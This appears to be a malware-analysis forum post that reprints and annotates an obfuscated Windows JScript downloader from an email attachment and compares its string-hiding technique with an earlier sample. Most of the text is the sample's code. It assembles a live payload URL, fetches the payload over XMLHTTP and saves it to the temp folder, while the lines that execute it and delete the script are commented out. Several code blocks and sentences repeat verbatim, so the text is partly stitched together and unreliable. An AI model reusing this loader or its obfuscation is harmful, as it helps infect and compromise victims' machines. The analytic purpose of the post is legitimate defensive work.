//jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);
// Analyst notes (review): second copy of the EMAIL_25793.js listing as rendered on this page.
// It starts one line later than the copy above (the `uwabbyranl` / "cmd." declaration is
// missing here), otherwise the text is the same. Obfuscation pattern: every `var` indexes an
// array literal whose single string element sits at the quoted index, yielding one short
// fragment; the numeric elements are padding. Fragments are concatenated below into COM
// ProgIDs, method names and JScript source compiled with `new Function`.
var yfezico0 = [8, "9 =", 9, 8, 8, 8, 5, 1]["1"];
var exolcyky = [2, 1, "ete", 4, 1, 7, 1, 5, 3]["2"];
var kzunaxve5 = [6, 5, 7, 7, 6, 7, 8, 5, "eTo"]["8"];
var jzucpekkage = [4, 3, 6, 3, 5, 4, "cia", 2, 6, 3]["6"];
var otvebolhyn = [5, 9, 5, 6, 2, 3, 8, 'on', 4, 2]["7"];
var bvunygze9 = [2, "rn '", 2, 6, 1, 6, 5, 1]["1"];
var yfjobulki = ["jw ", 1, 1, 7, 1, 6, 1, 4, 6, 4]["0"];
var jyryxxirnu = ['e', 2, 6, 2, 5, 9, 6, 4]["0"];
var qdiqxywili4 = [4, 7, 1, 5, "1')", 3, 3, 9, 5, 2]["4"];
var ohmicmoftil = ["scri", 6, 5, 4, 7, 6, 5, 4, 6]["0"];
var ygpagag = [4, 9, 6, 3, 2, "ont", 5, 2]["5"];
var lagyvgeq4 = [6, 3, 5, 1, 5, 2, "lFo", 3]["6"];
var xqasmyvpe = [" 4;", 3, 5, 2, 6, 8, 6, 9, 4]["0"];
var usbijvepij = [6, 3, "ngt", 8, 9, 9, 1, 4, 6, 3]["2"];
var qziherlamwo = [8, 2, 2, 6, 9, 6, 3, 9, "h.t", 4]["8"];
var slyplumxop8 = [1, 6, 8, 4, 3, 6, "bje", 9, 1, 1]["6"];
var iwebog = [5, 4, 3, 5, 7, "yst", 3, 5, 4]["5"];
var gemoto6 = [5, 3, 5, 3, 8, 3, "etu", 8, 9]["6"];
var binsujod1 = [3, 4, "xv9", 8, 7, 5, 8, 5, 3]["2"];
var bzacoge6 = [1, 4, 1, 3, "stem", 6, 7, 5, 5, 7]["4"];
var izretadvi = [3, 5, 2, 1, "ive", 7, 9, 2]["4"];
var cbufzeqkulc5 = [1, 3, 6, 6, 4, "MSXM", 2, 9]["5"];
var tanynu2 = [4, "ct';", 4, 6, 5, 6, 2, 8]["1"];
var iqjiwpalo = [9, 7, 9, 9, 8, 2, 5, "tiv", 6, 2]["7"];
var utyxoju2 = ["g.Fi", 4, 9, 3, 8, 3, 9, 4]["0"];
var otyvzysun = [7, 3, "urn", 4, 2, 3, 1, 4, 8, 7]["2"];
var qusuhyxi = ['Stat', 1, 8, 3, 2, 6, 5, 5]["0"];
var yfomgurudm = [7, 8, 8, "Nam", 5, 5, 6, 1, 2]["3"];
var worityn = [8, 2, "Act", 9, 8, 1, 8, 8, 1, 7]["2"];
var vvecjijki4 = [4, 4, 6, 9, 6, 1, 5, "htt", 8]["7"];
var lgufjaregzi = ['iti', 7, 2, 3, 7, 2, 3, 9, 6, 4]["0"];
// Handle on the Windows Script Host object; read later for ScriptFullName.
var aqympiw = WScript;
var akiwely = [7, "0()", 1, 7, 3, 6, 3, 8]["1"];
var yxytud8 = [2, 9, 7, "p:/", 5, 4, 2, 9]["3"];
var uzanulx = [2, 7, 8, 6, 8, 1, 1, 5, 4, "asu"]["9"];
var uxysizi = [4, 6, 6, 2, 6, 8, 9, "/ww", 7]["7"];
var fumweledzu6 = ["ipt.", 5, 2, 8, 2, 6, 6, 5]["0"];
var wexuflu = [1, 3, 8, 2, 'me', 9, 1, 2, 5]["4"];
var rajkezhefli = [8, 3, 6, 4, 7, "ptin", 1, 2, 4]["5"];
var ugipit5 = [5, "op/", 7, 7, 5, 3, 7, 3]["1"];
var ruxrabu = [7, 'me', 9, 6, 7, 5, 7, 8]["1"];
var qcevesrozci = [4, 6, 9, "h >", 6, 5, 9, 5, 5]["3"];
var yptypmewo4 = [8, 7, 9, 6, 1, 7, 2, "ily"]["7"];
var yfhopiqluhh2 = [7, 8, 5, 7, 1, 4, "ath", 4, 4]["6"];
var ukekkiva = [8, "/c ", 7, 6, 6, 7, 9, 9, 8]["1"];
var zevibnib = [1, "seB", 1, 4, 2, 2, 2, 5, 7, 8]["1"];
var jajyhyxwy = [7, 6, 5, 8, 2, 8, 8, 3, 6, 'Ful']["9"];
var yjybxywif5 = [8, 9, 2, "teP", 8, 7, 4, 7, 5]["3"];
var wmunafy = [7, 3, 7, 6, 2, "eam", 8, 9]["5"];
var gamcedeku0 = ["jw.", 8, 8, 1, 1, 5, 8, 7]["0"];
var mazqakyjzo = [3, 5, 5, "ADO", 5, 5, 5, 5]["3"];
var osabaq = [9, 6, 2, 'Typ', 1, 1, 1, 2]["3"];
var nygqyczoz = [2, 3, 4, 7, "MLHT", 9, 8, 6, 6]["4"];
var bidnovvyqp6 = ["apl", 4, 3, 5, 9, 7, 4, 1, 3]["0"];
var awgykpomoj1 = ["Clos", 3, 9, 3, 9, 2, 8, 9, 7, 2]["0"];
var tfufubres0 = [3, 5, 8, 5, 7, 'Tem', 8, 5]["5"];
var keluqy4 = [3, 2, 2, 9, 1, 9, "bje", 7]["6"];
var lgimonra3 = [1, "Pos", 1, 9, 2, 4, 1, 4]["1"];
var pdimuly = [6, 1, "send", 5, 4, 7, 8, 4]["2"];
var zbydiqsoli4 = [6, "at", 5, 5, 2, 2, 1, 9, 1, 8]["1"];
var brisewet = [6, 5, 9, 7, 9, "L2.X", 1, 4, 9, 4]["5"];
var fjynhevonra1 = [2, 'Sav', 9, 2, 9, 3, 2, 8, 1, 5]["1"];
var molycohj0 = ["e('", 6, 1, 5, 2, 5, 3, 9, 3, 7]["0"];
var ashesubw5 = [5, 5, 4, 8, 2, 5, 1, 5, "akp", 2]["8"];
var mypzynkug = ["?f=", 1, 9, 8, 8, 7, 4, 3]["0"];
var hnegfepsuta3 = [2, 7, 3, 4, 1, 3, 5, 6, "te", 9]["8"];
var brigigo4 = [6, "Obje", 5, 5, 2, 5, 9, 3]["1"];
var iveruky = [3, 3, "Abs", 6, 6, 7, 2, 2, 4, 9]["2"];
var hdocirzy1 = [5, 6, "e", 2, 5, 9, 2, 7, 9]["2"];
var kjunyhimo = [8, 9, 4, 7, 1, "Get", 5, 6, 8]["5"];
var tonumejt = [3, 6, 5, "ipt", 3, 1, 7, 1]["3"];
var tigviqzave7 = [9, "ing", 8, 5, 4, 1, 1, 8]["1"];
var ysgupuphuwh = [3, 9, "wug", 2, 7, 4, 8, 3, 2, 6]["2"];
var umunozemw = [1, 5, 2, 4, 6, 9, 8, 8, "retu"]["8"];
var djyvoroc = [7, 6, 8, 5, 9, 9, 2, "l", 1, 7]["7"];
var ytydqesxer0 = [9, 1, 8, 3, 6, 4, 3, 2, "ew ", 9]["8"];
var exaqkyvtir = [4, "t(m", 7, 5, 6, 5, 5, 6]["1"];
var uvmewasca = [9, 7, 1, 9, 8, 8, 3, 2, 4, 'r']["9"];
var izucuwg3 = [6, 2, 4, ".le", 7, 3, 9, 1, 5]["3"];
var ucyvyxquqk = [9, 9, 7, 9, 8, 3, "jec", 2]["6"];
var ynabovx4 = [6, "us", 5, 3, 6, 8, 4, 7, 8]["1"];
var omxemhylf2 = [4, 5, 3, 4, 6, " jr", 4, 2, 6]["5"];
var ysvafvef4 = [2, 6, 6, 8, 6, "ret", 4, 1]["5"];
var evqubecipn7 = [1, 7, 9, 3, 4, 9, 1, "); ", 6, 6]["7"];
var bifwotpu = ["; r", 9, 1, 5, 4, 7, 9, 7, 5]["0"];
var jenhadno1 = ['ody', 2, 1, 8, 4, 1, 9, 7]["0"];
var rtyrcomozsa8 = [8, 5, 4, 9, 'Get', 5, 4, 1]["4"];
var yksazbasfo8 = [6, 'Res', 6, 9, 8, 1, 9, 1, 5]["1"];
var ywdoczycg = [3, 5, "Str", 3, 6, 1, 5, 7]["2"];
var nuvykkorbu = [7, "Shel", 1, 7, 8, 2, 2, 1, 9]["1"];
var onbitbij = ["WScr", 8, 7, 4, 7, 3, 8, 2, 5, 8]["0"];
var ybyjecehm = [2, "DB.", 6, 2, 6, 8, 6, 8]["1"];
var vwafgehni0 = [1, 9, 6, "run", 6, 6, 8, 1, 6]["3"];
var igoptujmyk = [3, 2, 1, 5, 2, 5, 6, 'Fil', 8]["7"];
var uqdostufy1 = [5, 5, "= n", 9, 6, 5, 1, 3]["2"];
var bbegvobexjy6 = [1, 2, 1, 3, 5, 8, 2, 4, "TP"]["8"];
var porosy6 = [9, 3, "asu", 5, 8, 1, 9, 3]["2"];
var hgudipcu = [2, 4, 2, 2, 1, 4, 6, "n", 1, 3]["7"];
var ojhenyteht = ["rn ", 3, 5, 6, 1, 9, 9, 5, 2, 7]["0"];
var odojkycxyzd = [4, 1, 4, 4, 7, 2, 8, 'open', 4, 1]["7"];
var ofeqyxhuwt = [4, 9, "eXO", 1, 3, 7, 1, 3]["2"];
var kpiheko = [3, 8, 5, 5, 6, 6, 5, 6, "ugv", 5]["8"];
var deqxihaky = [2, 9, 7, 5, 2, 9, "olu", 1]["6"];
var kyvgicis3 = [1, 3, 1, 3, 7, 4, 1, 8, "var", 1]["8"];
var obutdymi = [4, 'Fil', 4, 4, 8, 7, 4, 5, 2]["1"];
var tkymrawcy = [2, 5, 3, 9, 1, 'ipt', 8, 3, 6, 7]["5"];
var fhadisuhy = [6, 6, 3, 1, 8, 4, "leS", 2, 1, 6]["6"];
var rzedsygwu = [3, 3, 6, 7, 7, "w.c", 5, 1]["5"];
// Path separator fragment (two backslashes as posted; may be a forum escaping artefact).
var anhujyv1 = [3, 5, 9, 8, "\\\\", 9, 4, 7]["4"];
var udbuxdakhavq = [1, 2, 8, 6, "adm", 9, 5, 1]["4"];
var fdukezyh8 = [6, 5, 3, 5, 9, 9, 6, 2, "Scr", 7]["8"];
var texlopkak1 = [2, 7, 5, 3, "Scr", 8, 6, 8, 6, 6]["4"];
var episyvt7 = [7, 6, 5, 8, 5, 1, 6, 7, "php", 9]["8"];
var ewnehaca = [8, 9, 9, " Ac", 3, 9, 2, 1]["3"];
var emytipq = [7, 4, 5, 9, 1, 5, 3, "ct;", 3, 3]["7"];
var soxispi = [1, ".Fi", 2, 2, 3, 1, 5, 9]["1"];
var ihdufdutynd6 = [9, 8, 5, 3, 4, 6, 3, 2, 6, "XOb"]["9"];
var uflesepf = [3, "riv", 2, 4, 4, 2, 6, 6, 8, 9]["1"];
var zudxoba8 = [2, 7, 'e', 3, 3, 4, 4, 7, 3, 1]["2"];
var bacodta2 = [4, 7, "emO", 8, 5, 8, 4, 1, 4]["2"];
var afehjate1 = [9, 5, 'lNa', 1, 9, 3, 7, 5, 2, 8]["2"];
var exacdubx = [3, 8, 9, 8, 7, 5, "in.", 8, 3]["6"];
var oxefzetfez2 = [1, 2, "vil", 5, 9, 4, 2, 4, 3, 5]["2"];
var ipexetl = [5, 8, " jr", 6, 2, 2, 4, 1, 2]["2"];
var hhitwycyxd0 = [4, 4, 5, 1, 6, 'lde', 1, 2]["5"];
var umqesas0 = [1, 4, 9, "exe ", 5, 2, 5, 8, 4]["3"];
var snumsisike = [8, 1, 4, 3, 3, 9, 1, 'Wri', 6, 7]["7"];
var bigpefco = [1, 7, 8, 4, "e", 2, 6, 7, 3, 7]["4"];
var quludvi1 = ["Spe", 8, 3, 7, 9, 1, 9, 5]["0"];
var aptimota = [8, "var", 9, 6, 6, 7, 4, 7, 4]["1"];
var mixemrid4 = [9, 5, "ct", 2, 6, 5, 7, 5, 8, 9]["2"];
var odrifmigh = [8, "lesy", 1, 5, 7, 3, 8, 8, 7]["1"];
var odomebef = [4, 6, 7, 8, 7, 3, "pon", 5]["6"];
var zcexsaqekg = [2, "Get", 1, 9, 3, 9, 8, 1]["1"];
var ulhabvaze2 = [8, 5, 6, 9, 7, 7, "edz", 4]["6"];
var etjufymurb = [3, 7, 8, 3, 9, 4, "yxv", 2, 4, 5]["6"];
var mopepo = ["GET", 7, 6, 2, 9, 7, 6, 5, 5]["0"];
var xdimrugva0 = [2, 8, 8, 2, 2, 3, 8, "ovw"]["7"];
var ahnensuhuv = [6, 6, 8, 9, "2.d", 7, 8, 8]["4"];
var gibdymco0 = [4, "pNa", 3, 9, 4, 5, 6, 6]["1"];
var ipjatzypko = [4, "zyd", 6, 6, 1, 8, 8, 5]["1"];
var cimwenxi = [9, " ov", 5, 4, 6, 5, 7, 8, 4, 6]["1"];
var urtiwguqja = [4, 1, 'Ope', 9, 8, 6, 7, 9, 3]["2"];
var ifcedyka9 = [4, 6, 2, 7, 7, 2, "del", 3, 3]["6"];
// "return 'scripting.FilesystemObject';" -- body of the helper compiled as mzydakpapl0 below.
var irvyrzisi1 = [4, 7, 2, umunozemw + bvunygze9 + ohmicmoftil + rajkezhefli + utyxoju2 + odrifmigh + bzacoge6 + brigigo4 + tanynu2, 6, 9, 4, 9]["3"];
// JScript source of the environment check: creates an FSO through mzydakpapl0(), calls
// GetAbsolutePathName('1') and returns whether the result is longer than 4 characters
// (most likely the corrected path-name check the post refers to).
var dijditonz6 = [2, 4, 3, 3, 6, 7, kyvgicis3 + ipexetl + porosy6 + yfjobulki + uqdostufy1 + ytydqesxer0 + worityn + izretadvi + ihdufdutynd6 + ucyvyxquqk + exaqkyvtir + ipjatzypko + ashesubw5 + bidnovvyqp6 + akiwely + evqubecipn7 + aptimota + cimwenxi + ysgupuphuwh + oxefzetfez2 + etjufymurb + yfezico0 + omxemhylf2 + uzanulx + gamcedeku0 + kjunyhimo + iveruky + deqxihaky + yjybxywif5 + yfhopiqluhh2 + yfomgurudm + molycohj0 + qdiqxywili4 + bifwotpu + gemoto6 + ojhenyteht + xdimrugva0 + kpiheko + yptypmewo4 + binsujod1 + izucuwg3 + usbijvepij + qcevesrozci + xqasmyvpe, 5]["6"];
// "return ActiveXObject;" -- compiled inside the switch to obtain the ActiveXObject constructor.
var ileslyxy5 = [1, 3, 9, ysvafvef4 + otyvzysun + ewnehaca + iqjiwpalo + ofeqyxhuwt + keluqy4 + emytipq, 1, 1, 7, 4, 5, 6]["3"];
// "ADODB.Stream"
var yvyndax = [6, 2, 4, 6, 3, 6, 5, 4, mazqakyjzo + ybyjecehm + ywdoczycg + wmunafy, 3]["8"];
// Payload URL, 15 fragments (defanged): hxxp://www[.]contrivedzh[.]top/admin.php?f=2.dat
var ijigsokhimw3 = [5, 5, 2, 9, 6, vvecjijki4 + yxytud8 + uxysizi + rzedsygwu + ygpagag + uflesepf + ulhabvaze2 + qziherlamwo + ugipit5 + udbuxdakhavq + exacdubx + episyvt7 + mypzynkug + ahnensuhuv + zbydiqsoli4, 3, 1, 5, 4]["5"];
// "WScript.Shell"
var derfycgy = [5, 2, 8, 6, 2, 6, onbitbij + fumweledzu6 + nuvykkorbu + djyvoroc, 3, 7, 4]["6"];
// "MSXML2.XMLHTTP"
var axduxynat = [cbufzeqkulc5 + brisewet + nygqyczoz + bbegvobexjy6, 1, 1, 6, 7, 9, 6, 8]["0"];
// "Scripting.FileSystemObject"
var epcemescip = [9, 3, 7, 9, texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4, 7, 8, 5, 2]["4"];
// path separator (see anhujyv1 above)
var zgafgado = [6, 8, 6, 7, 7, 8, 7, anhujyv1, 2]["7"];
// "GET"
var yzozyvy = [4, 4, 7, 6, mopepo, 9, 2, 1, 1, 9]["4"];
// "cmd.exe /c " in the full sample. uwabbyranl ("cmd.") is declared only in the first copy
// of the listing on this page, so as rendered here this copy would not run as-is.
var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];
// alias of the WScript host object
var imis9 = aqympiw;
// Helper returning the FSO ProgID; created but not invoked here, it is called by its global
// name from inside the check compiled at ujdyqkoz below.
var mzydakpapl0 = new Function(irvyrzisi1);
// Decoys: nested array + index; none of these names is referenced again in the listing.
var mujegbe = [2, 7, 1, 8, ["rka", 1, 3, 6, 5, 5, 7, 7, 9], 1, 2, 3, 2, 2]["4"];
var cafyjep8 = [8, [6, 6, 3, 1, 3, 6, 4, 6, "cmi", 6], 5, 6, 8, 4, 2, 4]["1"];
var zfukqilvalho7 = [6, 9, 9, 3, 4, 9, 2, 9, 3, [2, 9, 7, 5, 1, 8, 5, 3, "up"]]["9"];
var yxivuvwus = [5, 9, 8, 1, 5, 3, 3, [4, 2, 9, 3, "vpa", 6, 7, 4, 5], 4]["7"];
var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
var yqlypnuksud = [8, 4, [8, 7, 1, 7, "gy", 3, 6, 4, 9, 6], 2, 5, 5, 8, 8, 1, 3]["2"];
var dcigacwa4 = [1, 5, 5, 7, 1, 9, 7, [1, 6, 1, "tto", 6, 2, 8, 5, 5], 7, 9]["7"];
var ubmycoble0 = [[2, "zh", 1, 3, 2, 5, 7, 4, 5], 7, 8, 3, 2, 9, 4, 2, 2, 6]["0"];
var ujtodunyf5 = [6, 7, [3, 5, 5, "co", 8, 4, 9, 8, 1], 8, 1, 1, 4, 5]["2"];
var japumu0 = [8, 6, [4, 7, 4, 7, 5, "ry", 9, 8, 6, 7], 7, 5, 5, 6, 1, 9, 3]["2"];
var zuvlezyxe8 = [[4, "lm", 6, 7, 6, 8, 9, 9, 5], 2, 1, 5, 3, 4, 1, 1, 1]["0"];
var ebecuntu5 = [5, 2, 3, 3, 5, 4, 2, ["lqy", 8, 2, 7, 6, 6, 1, 9, 6], 6, 1]["7"];
var mrovwegigca = [9, 3, 8, 3, 5, 1, [2, 2, "avb", 4, 5, 5, 4, 2], 6]["6"];
var zytxyfloldu = [7, 8, 2, 2, 6, 2, [4, "aq", 4, 8, 9, 3, 7, 8, 5, 9], 5, 4]["6"];
var qygsuwwo = [1, 1, [8, 2, "ex", 9, 6, 1, 8, 3], 4, 3, 1, 3, 5]["2"];
// Runs the environment check; ujdyqkoz gates the switch that follows.
var ujdyqkoz = new Function(dijditonz6)();
// More decoys, same pattern, never referenced again.
var asborqyqkyrm0 = [3, [7, 1, 1, 1, 3, 9, "o", 2], 7, 9, 3, 8, 9, 5, 8, 1]["1"];
var gykehogcu3 = [5, 8, 9, 4, [4, 1, 5, 1, 6, 4, 7, "k", 3], 2, 9, 8, 3]["4"];
var daxzaxyme4 = [2, [1, 8, 8, 4, "abt", 1, 9, 7, 6, 8], 2, 7, 2, 1, 5, 6, 1]["1"];
var hcimuqxixw4 = [7, 8, [5, "u", 9, 5, 6, 9, 3, 6], 7, 9, 3, 6, 5]["2"];
var hujcesej = [9, 4, [4, 2, 7, "mna", 8, 6, 5, 5], 7, 4, 4, 9, 8, 7]["2"];
var epowpabnohp4 = [5, 8, 3, ["sc", 4, 8, 2, 7, 5, 6, 1], 9, 7, 5, 6, 2, 1]["3"];
var ymseppybi4 = [[6, 9, "va", 3, 3, 1, 8, 3], 2, 2, 9, 2, 3, 3, 8]["0"];
var gpasgufxeti0 = [4, 1, 4, 2, 5, 1, [8, 7, "g", 4, 7, 7, 8, 4, 9], 8, 3, 5]["6"];
var utduhaciwp3 = [1, 2, [8, 4, 7, 1, 2, 6, 3, 1, 7, "it"], 2, 4, 8, 3, 5]["2"];
var mjowyfzuk = [8, 9, 2, 5, 2, [4, "o", 4, 9, 1, 2, 1, 7], 3, 8, 5]["5"];
var vekxiby = [8, 9, 6, [5, 7, 2, 8, 4, "kq", 5, 7], 7, 6, 1, 4, 6]["3"];
var omalobre7 = [1, [5, 1, 5, 4, "xu", 3, 4, 7, 9, 7], 4, 9, 8, 8, 4, 9, 4]["1"];
var azocxisw = [[4, 8, 9, 8, "ufk", 8, 2, 3], 6, 2, 7, 2, 3, 2, 3, 9, 5]["0"];
var yxycqati = [5, 2, [5, 9, 9, 6, 4, 9, "z", 2, 8, 1], 7, 5, 1, 4, 9]["2"];
var guzcapebh = [3, 6, 5, 7, 8, 2, 9, [7, 3, "o", 4, 8, 6, 4, 7, 8]]["7"];
// Gate: the ActiveXObject constructor is obtained only when the FSO path check returned
// `true`; otherwise hvaqxena stays undefined and the `new hvaqxena(...)` calls below throw,
// so the script aborts before any download.
switch (ujdyqkoz) {
case true:
// hvaqxena = ActiveXObject (compiled body: "return ActiveXObject;").
var hvaqxena = new Function(ileslyxy5)();
// Padding; none of these names is referenced again.
var ulosucith = [5, 1, 3, 1, 8, [4, 9, 3, 1, 3, 5, "o", 7, 1], 6, 9]["5"];
var mkolheni2 = [3, 9, [9, 3, 6, "n", 6, 7, 9, 3, 2], 6, 8, 4, 9, 8]["2"];
var emnylpupp4 = [[8, 9, "jnu", 1, 3, 3, 5, 1, 7], 7, 6, 8, 2, 8, 7, 2]["0"];
var geqjyxytp7 = [2, 1, 7, 4, 2, [4, "id", 4, 5, 1, 8, 1, 1], 2, 7, 7]["5"];
var abuqxyhe5 = [7, 7, 7, 1, 1, 9, 1, [7, 5, 3, 6, 2, 6, 6, "jj"]]["7"];
var evgoxhogqo7 = [3, 7, 8, 4, 1, 1, 5, 6, 5, [1, 3, 3, 2, 6, 4, 9, 5, "ep", 9]]["9"];
var jegewyxde = [7, 7, 9, 1, [7, 6, 3, 6, 8, "i", 9, 2, 7], 4, 7, 6, 7]["4"];
var himbatad = [8, 1, 4, 4, 5, 6, 2, 6, 5, [7, "o", 2, 8, 2, 5, 2, 3, 6]]["9"];
var omulpybl5 = [[2, 2, 3, 5, 5, 8, "u", 1, 9], 1, 6, 1, 8, 2, 8, 9]["0"];
var sqyvalapy0 = [[5, 8, 7, 6, 9, 4, 7, 4, 1, "i"], 4, 8, 9, 9, 6, 7, 6, 6, 1]["0"];
var ohucrilc3 = [3, 6, 4, [6, 5, 4, 6, 8, 3, 6, "z", 1, 7], 1, 4, 9, 6, 8]["3"];
var ytelrurm8 = [9, 4, 4, 7, 3, 1, 8, [6, 1, 5, 7, 4, 2, 3, 5, "am", 8]]["7"];
var eziwyqfox3 = [3, 4, 6, 1, 2, 7, 7, 5, [7, 8, 1, 6, 3, 8, 8, "xa", 9, 4], 6]["8"];
var tapkemifwo7 = [8, 6, 6, [5, 2, "yh", 8, 7, 1, 7, 3], 2, 1, 8, 1]["3"];
var rhawuxpullu = [5, 6, 3, 5, 2, 3, 7, 8, 4, [4, 9, 5, 9, 3, 7, "bno", 2, 8, 2]]["9"];
break;
}
// Main routine (second copy on this page), decoded meaning in the comments: fetch the payload
// over XMLHTTP, write it to a temp file through ADODB.Stream, then (in the original) run it
// and delete this script. Both action lines are commented out, consistent with the post's
// note that the spoiler was modified to prevent copy-paste execution.
var owdeqg2 = yvyndax;
// new ActiveXObject("ADODB.Stream")
var ekwidedul = new hvaqxena(owdeqg2);
// stream.Open()
ekwidedul[urtiwguqja + hgudipcu]();
// payload URL
var qupqykmy = ijigsokhimw3;
// stream.Position = 0
ekwidedul[lgimonra3 + lgufjaregzi + otvebolhyn] = 0;
var gmavabava8 = derfycgy;
// WScript.ScriptFullName -- only used by the commented-out self-delete at the end.
var ecystogo = imis9[fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu];
// new ActiveXObject("WScript.Shell") -- only used by the commented-out run line.
var exet3 = new hvaqxena(gmavabava8);
var qrujcydvipd9 = axduxynat;
var gvidummulj7 = epcemescip;
// new ActiveXObject("Scripting.FileSystemObject")
var jrasujw = new hvaqxena(gvidummulj7);
// new ActiveXObject("MSXML2.XMLHTTP")
var abogikn = new hvaqxena(qrujcydvipd9);
// Target path: fso.GetSpecialFolder(2) (temp folder) + separator + fso.GetTempName().
var czeqip = jrasujw[rtyrcomozsa8 + quludvi1 + jzucpekkage + lagyvgeq4 + hhitwycyxd0 + uvmewasca](2) + zgafgado + jrasujw[zcexsaqekg + tfufubres0 + gibdymco0 + ruxrabu]();
// xmlhttp.open("GET", url, 0) -- synchronous request.
abogikn[odojkycxyzd](yzozyvy, qupqykmy, 0);
// xmlhttp.send()
abogikn[pdimuly]();
// stream.Type = 1 (binary)
ekwidedul[osabaq + zudxoba8] = 1;
// if (xmlhttp.Status == 200) -- any other status silently does nothing.
if (abogikn[qusuhyxi + ynabovx4] == 200) {
// stream.Write(xmlhttp.ResponseBody)
ekwidedul[snumsisike + hnegfepsuta3](abogikn[yksazbasfo8 + odomebef + zevibnib + jenhadno1]);
// stream.SaveToFile(tempPath)
ekwidedul[fjynhevonra1 + kzunaxve5 + obutdymi + jyryxxirnu](czeqip);
// stream.Close()
ekwidedul[awgykpomoj1 + hdocirzy1]();
// "cmd.exe /c " + tempPath
var yhamgyv1 = odynfinteds + czeqip;
// Original: shell.run(commandLine, 0) -- neutered by the post author.
//exet3[vwafgehni0](yhamgyv1, 0);
}
// Original: fso.DeleteFile(WScript.ScriptFullName) -- self-deletion, also neutered.
//jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);
2) Main differences with previous analyzed POSTNORD_1755.js :
2-1 ) The arrays parts :
Before :
The strings really used were obfuscated: divided among several vars with strange names, each part hidden in an array + function call :
// .wuqjy() is the obfuscated alias of Array.prototype.pop() (see the note below),
// so each var simply receives the last element of its array: "ri", "WS", "jf", "La", "Bo".
var ifpagn3 = [707, 3703, 402, 4283, 8168, 3068, 8768, 3403, 3035, 7441, 4400, 3460, 2550, 5548, 3583, 6534, 3040, 8367, "ri"].wuqjy();
var uhadvo8 = [6476, 796, 2367, 4143, 6423, 5940, 3165, 9323, 4834, 4697, 5617, 1273, 9839, 1412, "WS"].wuqjy();
var uxodhy7 = [6532, 1901, 2855, 1852, 7316, 5498, 8452, 4555, 7386, 1261, 7237, 4312, 6763, 8496, "jf"].wuqjy();
var xpyqegxovog4 = [299, 8746, 397, 9032, 4189, 8297, 2463, 2690, 8177, 1406, 1770, 3001, 3468, 7901, 5140, 7728, 4614, "La"].wuqjy();
var amtumyj7 = [2042, 3018, 6405, 578, 3972, 6187, 9686, 3305, 233, 3598, 181, 2311, 6179, 2605, 8505, "Bo"].wuqjy();
We saw in the previous analysis that .wuqjy() was a function used to hide the real JavaScript method being called : .pop()
An example In the main part (after several functions and vars have been build with the above method) :
// .wuqjy() is the obfuscated .pop(): the three vars receive "Wr", "it" and "e",
// which the main part concatenates back into "Write" (see below).
var enxocqojolv5 = [4764, 8988, 2383, 8868, 8354, 3116, 8929, 9605, 846, 7291, 7109, 1151, "Wr"].wuqjy();
var izavoned3 = [7684, 5677, 403, 6613, 5283, 1150, 3905, 2392, 2201, 1746, 9014, 6705, 3619, 5479, 1781, 2880, 1417, 8530,"it"].wuqjy();
var mkaqaxykco0 = [1638, 8609, 6242, 3285, 7624, 2948, 6805, 3103, 4630, 9585, 4421, 3160, 3408, 1782, 7007, 7779, "e"].wuqjy();
=> enxocqojolv5 + izavoned3 + mkaqaxykco0 = "Write"
// .wuqjy() is the obfuscated alias of Array.prototype.pop() (see the note below),
// so each var simply receives the last element of its array: "ri", "WS", "jf", "La", "Bo".
var ifpagn3 = [707, 3703, 402, 4283, 8168, 3068, 8768, 3403, 3035, 7441, 4400, 3460, 2550, 5548, 3583, 6534, 3040, 8367, "ri"].wuqjy();
var uhadvo8 = [6476, 796, 2367, 4143, 6423, 5940, 3165, 9323, 4834, 4697, 5617, 1273, 9839, 1412, "WS"].wuqjy();
var uxodhy7 = [6532, 1901, 2855, 1852, 7316, 5498, 8452, 4555, 7386, 1261, 7237, 4312, 6763, 8496, "jf"].wuqjy();
var xpyqegxovog4 = [299, 8746, 397, 9032, 4189, 8297, 2463, 2690, 8177, 1406, 1770, 3001, 3468, 7901, 5140, 7728, 4614, "La"].wuqjy();
var amtumyj7 = [2042, 3018, 6405, 578, 3972, 6187, 9686, 3305, 233, 3598, 181, 2311, 6179, 2605, 8505, "Bo"].wuqjy();
We saw in the previous analysis that .wuqjy() was a function used to hide the real JavaScript method being called : .pop()
=> to retrieve the last value of the array
For example :
var ifpagn3 = [707, 3703, 402, 4283, 8168, 3068, 8768, 3403, 3035, 7441, 4400, 3460, 2550, 5548, 3583, 6534, 3040, 8367, "ri"].wuqjy();
that is in reality :
var ifpagn3 = "ri"
Using this method, long strings used in the main part of the script are replaced by the concatenation of several strangely named variables, whose contents are the pieces of readable strings.
An example In the main part (after several functions and vars have been build with the above method) :
enxocqojolv5 + izavoned3 + mkaqaxykco0 => !?!?
A search (with notepad++, for example) give :
// .wuqjy() is the obfuscated .pop(): the three vars receive "Wr", "it" and "e",
// which the main part concatenates back into "Write" (see below).
var enxocqojolv5 = [4764, 8988, 2383, 8868, 8354, 3116, 8929, 9605, 846, 7291, 7109, 1151, "Wr"].wuqjy();
var izavoned3 = [7684, 5677, 403, 6613, 5283, 1150, 3905, 2392, 2201, 1746, 9014, 6705, 3619, 5479, 1781, 2880, 1417, 8530,"it"].wuqjy();
var mkaqaxykco0 = [1638, 8609, 6242, 3285, 7624, 2948, 6805, 3103, 4630, 9585, 4421, 3160, 3408, 1782, 7007, 7779, "e"].wuqjy();
=> enxocqojolv5 + izavoned3 + mkaqaxykco0 = "Write"
With this method, it is very easy to find the "piece of strings" because it is always the last value of the array that is useful.
The previous sample in details : https://malwaretips.com/threads/postnord_1755-js-error-on-the-path-name-payload-cryptolocker.65623/
In the new samples :
They have tried to improve this part with other sorts of arrays and another retrieval method.
3 sorts of arrays are used :
I will show 3 examples from a lot of arrays used :
3 sorts of arrays are used :
I will show 3 examples from a lot of arrays used :
// Type 1: the index ("5") selects a plain string -> uwabbyranl = "cmd."
var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];
// Type 2 (decoy): the index ("5") selects the nested array; the var is referenced nowhere else.
